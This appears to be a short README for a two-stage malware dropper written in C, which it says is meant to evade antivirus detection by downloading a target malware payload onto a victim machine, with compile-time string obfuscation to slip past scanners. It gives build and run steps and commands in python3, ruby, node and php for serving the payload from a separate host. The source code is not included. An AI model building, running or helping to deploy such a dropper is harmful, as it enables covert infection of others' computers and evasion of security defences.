This is a two-stage dropper malware snippet create with C.
The purpose of this malware is to avoid virus detection methods
by downloading the target malware to a target machine when the
executable runs.
This intermediate version utilizes some compile-time string obfuscation
techniques to further evade detection.
git clone msr
cd msr/
make # requires mingw
./dropper.exe # host must be running
In the the same directory, run any of the following commands on a (different machine). Using python3:
python3 -m http.server ${PORT}
Using ruby:
ruby -run -ehttpd . -p${PORT}
Using node:
npm install -g http-server
http-server -p ${PORT}
Using php:
IP=$(ifconfig | awk '{print $2}' | grep "192") # wlan
php -S ${IP}:${PORT}